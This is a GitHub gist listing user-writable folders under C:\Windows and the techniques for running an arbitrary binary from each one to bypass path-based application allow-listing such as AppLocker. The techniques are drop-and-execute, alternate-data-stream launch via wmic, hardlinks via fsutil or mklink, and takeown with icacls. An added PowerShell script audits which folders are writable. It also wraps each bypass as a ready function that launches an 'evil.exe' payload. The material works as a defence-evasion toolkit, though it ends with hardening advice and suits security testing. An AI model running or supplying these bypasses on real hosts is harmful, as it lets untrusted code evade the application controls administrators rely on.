@api0cradle
Last active September 4, 2023 22:25

Additional writable folders under the Configuration Manager (ccm) client directory, present only when that client is installed:

c:\Windows\ccm\inventory\noidmifs
c:\Windows\ccm\logs
c:\Windows\ccm\systemtemp\appvtempdata\appvcommandoutput

Create folder - Add ADS stream and execute == mkdir a new folder inside the path, write the binary into an alternate data stream on that folder (type evil.exe > <path>\newfolder:evil.exe) and launch the stream with wmic process call create '<path>\newfolder:evil.exe'. Give wmic the full path to the stream. wmic is deprecated on current Windows builds, but any launcher that ends in CreateProcess starts a stream path the same way.

Take ownership - Add all rights - Drop and execute == Create a new folder inside the path, take ownership of it, grant full NTFS rights on it (icacls <path>\newfolder /grant:r Everyone:(OI)(CI)F /T; granting only your own account is enough), then copy the binary into that folder and execute it from there.

Hardlink fsutil/mklink == Place evil.exe in a folder you control and have execute rights in (c:\myfolder). Then: fsutil hardlink create <path>\run.exe c:\myfolder\evil.exe and execute <path>\run.exe. mklink /H <path>\run.exe c:\myfolder\evil.exe works as well. Both files must be on the same NTFS volume, and it is the link's own path (under C:\Windows) that is evaluated when run.exe is executed.

Drop and execute == Copy the binary into the folder and execute it from there.

Access is what a standard user has on the folder: RW = read and write, W = write only.

| Folder | Bypass | Access |
|---|---|---|
| C:\Windows\Tasks | Drop and execute | RW |
| C:\Windows\Temp | Drop and execute | RW |
| C:\Windows\tracing | Create folder - Add ADS stream and execute OR Create new folder - Take ownership - Add all rights - Drop and execute | RW |
| C:\Windows\Registration\CRMLog | Hardlink fsutil/mklink | RW |
| C:\Windows\System32\FxsTmp | Hardlink fsutil/mklink | RW |
| C:\Windows\System32\com\dmp | Hardlink fsutil/mklink | W |
| C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys | Drop and execute | RW |
| C:\Windows\System32\spool\PRINTERS | Hardlink fsutil/mklink | W |
| C:\Windows\System32\spool\SERVERS | Hardlink fsutil/mklink | W |
| C:\Windows\System32\spool\drivers\color | Drop and execute | RW |
| C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter | Create folder - Add ADS stream and execute OR Create new folder - Take ownership - Add all rights - Drop and execute | RW |
| C:\Windows\SysWOW64\FxsTmp | Hardlink fsutil/mklink | RW |
| C:\Windows\SysWOW64\com\dmp | Hardlink fsutil/mklink | W |
| C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter | Create folder - Add ADS stream and execute OR Create new folder - Take ownership - Add all rights - Drop and execute | RW |
| C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System | Drop and execute | RW |
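The following PowerShell script is an added example and is not part of the original gist: it audits which of the folders in the table are actually writable by the current user on a given host, and wraps the four bypass primitives described above as functions so each can be tried against a folder from the table. Assumed context: path-based allow rules such as the AppLocker default rules, which permit execution from anywhere under C:\Windows. The payload location ($env:USERPROFILE\evil.exe, a copy of calc.exe), the function names (Test-WritableFolder, Invoke-DropAndExecute, Invoke-AdsBypass, Invoke-HardlinkBypass, Invoke-TakeOwnershipBypass) and the "sub" / "run.exe" names are this example's own choices. Invoke-CimMethod on Win32_Process stands in for the gist's wmic call, and New-Item -ItemType HardLink for fsutil/mklink.

```powershell
# Added example, not from the original gist. Windows PowerShell 5.1 or later, run as
# a standard (non-admin) user. Only the audit runs automatically; the Invoke-*
# functions run only when you call them (see the commented calls at the end).

# Assumption: the payload is a copy of calc.exe in the user's profile.
$Payload = Join-Path $env:USERPROFILE 'evil.exe'
if (-not (Test-Path -LiteralPath $Payload)) {
    Copy-Item -LiteralPath 'C:\Windows\System32\calc.exe' -Destination $Payload
}

# The folders from the table above.
$Folders = @(
    'C:\Windows\Tasks',
    'C:\Windows\Temp',
    'C:\Windows\tracing',
    'C:\Windows\Registration\CRMLog',
    'C:\Windows\System32\FxsTmp',
    'C:\Windows\System32\com\dmp',
    'C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys',
    'C:\Windows\System32\spool\PRINTERS',
    'C:\Windows\System32\spool\SERVERS',
    'C:\Windows\System32\spool\drivers\color',
    'C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter',
    'C:\Windows\SysWOW64\FxsTmp',
    'C:\Windows\SysWOW64\com\dmp',
    'C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter',
    'C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System'
)

function Test-WritableFolder {
    # Probes by really creating a file rather than reading the ACL: this also catches
    # the write-only (W) folders, where listing fails but file creation succeeds.
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return 'missing' }
    $probe = Join-Path $Path ('probe-{0}.tmp' -f [guid]::NewGuid())
    try {
        [IO.File]::WriteAllText($probe, 'x')
        Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
        $readable = $true
        try { $null = Get-ChildItem -LiteralPath $Path -Force -ErrorAction Stop } catch { $readable = $false }
        if ($readable) { return 'RW' } else { return 'W' }
    } catch {
        return 'no write'
    }
}

# "Drop and execute": copy the payload into the folder and run it from there.
function Invoke-DropAndExecute {
    param([string]$Folder)
    $dst = Join-Path $Folder 'run.exe'
    Copy-Item -LiteralPath $Payload -Destination $dst -Force
    Start-Process -FilePath $dst
    return $dst
}

# "Create folder - Add ADS stream and execute": the payload lives in an alternate data
# stream on a folder you created, so the path the rule evaluates is still under
# C:\Windows. cmd's "type ... >" writes the directory stream exactly as in the gist;
# Win32_Process.Create is the same call the deprecated "wmic process call create" makes.
function Invoke-AdsBypass {
    param([string]$Folder)
    $dir = New-Item -ItemType Directory -Path (Join-Path $Folder 'sub') -Force
    $stream = "$($dir.FullName):evil.exe"
    Start-Process -FilePath cmd.exe -ArgumentList "/c type `"$Payload`" > `"$stream`"" -Wait -WindowStyle Hidden
    $null = Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{ CommandLine = $stream }
    return $stream
}

# "Hardlink fsutil/mklink": same effect as  fsutil hardlink create <link> <target>  or
# mklink /H. Both files must sit on one NTFS volume, and current Windows builds require
# write access to the link target, which you have because the payload is your own file.
function Invoke-HardlinkBypass {
    param([string]$Folder)
    $link = Join-Path $Folder 'run.exe'
    $null = New-Item -ItemType HardLink -Path $link -Target $Payload -Force
    Start-Process -FilePath $link
    return $link
}

# "Create new folder - Take ownership - Add all rights - Drop and execute". The gist
# grants Everyone; granting only the current account is enough and leaves less behind.
function Invoke-TakeOwnershipBypass {
    param([string]$Folder)
    $dir = (New-Item -ItemType Directory -Path (Join-Path $Folder 'sub') -Force).FullName
    $null = takeown.exe /f $dir
    $null = icacls.exe $dir /grant:r "$($env:USERNAME):(OI)(CI)F" /T
    return Invoke-DropAndExecute -Folder $dir
}

# Audit: which of the listed folders can this user write to on this host?
$Folders | ForEach-Object {
    [pscustomobject]@{ Folder = $_; Access = Test-WritableFolder $_ }
} | Format-Table -AutoSize

# Examples of trying a primitive against a folder from the table (uncomment to run):
# Invoke-AdsBypass -Folder 'C:\Windows\tracing'
# Invoke-HardlinkBypass -Folder 'C:\Windows\Registration\CRMLog'
# Invoke-TakeOwnershipBypass -Folder 'C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter'
```

The audit is the part worth running first on a hardened host: a folder reported as RW or W is one where an allow-by-path rule covering C:\Windows should be paired with a deny rule for that folder, or replaced with publisher or hash rules. The probe file and any dropped run.exe, hardlink or sub folder are left for you to clean up.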